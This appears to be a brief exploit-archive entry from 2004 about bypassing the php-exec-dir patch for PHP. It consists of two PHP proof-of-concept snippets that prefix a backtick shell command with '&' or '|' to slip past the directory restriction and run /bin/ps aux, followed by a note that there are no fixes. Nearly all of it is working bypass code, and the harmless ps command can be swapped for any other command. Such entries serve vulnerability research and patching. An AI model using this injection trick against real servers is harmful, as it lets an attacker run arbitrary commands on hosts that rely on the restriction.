PHP (php-exec-dir) Patch Command Access Restriction Bypass
2004-08-08 00:00:00<?php
$blah = `& /bin/ps aux`;
echo nl2br($blah);
?>
<?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

